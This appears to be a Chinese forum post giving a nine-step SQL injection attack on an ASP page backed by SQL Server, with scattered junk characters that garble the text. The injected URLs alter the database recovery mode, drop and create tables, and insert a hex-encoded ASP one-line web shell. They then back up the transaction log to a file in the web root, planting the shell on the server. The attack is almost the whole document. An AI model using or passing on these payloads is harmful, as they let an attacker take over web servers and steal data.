第一步4 z$ C5 F: P( ?" ]
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]-- y# M, V4 S4 @7 ^( q
& r. e/ p; d3 o第二步:4 u% E8 }8 {' p2 H8 Z, y' q
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
& l% Z2 [+ \1 g; @+ O+ ?# n+ Z
$ M: x8 m- S9 D% n第三步, N! t. O1 `1 I3 R; v; I) w/ u1 _
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--8 a* W* N) H7 t/ y) \ a
& V* \& ^' l0 x/ G! ]
第四步
! y S! t( h' l! q4 k2 N3 \7 ?http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--; Q* \ K9 d; s/ r3 }( W9 m i4 V
$ Y8 ?7 @- @1 a+ {% B% m. r第五步
- t# p, u0 C' Ohttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--# |( T+ K, I/ X9 F7 j2 H. [
8 i$ Q! g# l6 i" L5 @' N: W9 s
第六步
9 y6 M, S; N3 c( `http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--! A* ?4 Q6 t0 _) L
' F) c! C( ?+ f
第七步4 r4 ?2 d8 ]. D2 R
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
0 L! D. |3 z! x9 n
; l0 z' v5 ^5 D第八步
+ W O9 P0 Q, Y _- ehttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--# A# h c, J' b6 K) ^
, y& k8 n1 u6 }; v6 X/ Y/ v( @
第九步
/ e1 n' V& w) C& hhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
: X2 @' W+ V- |& d8 D! Z0 @ |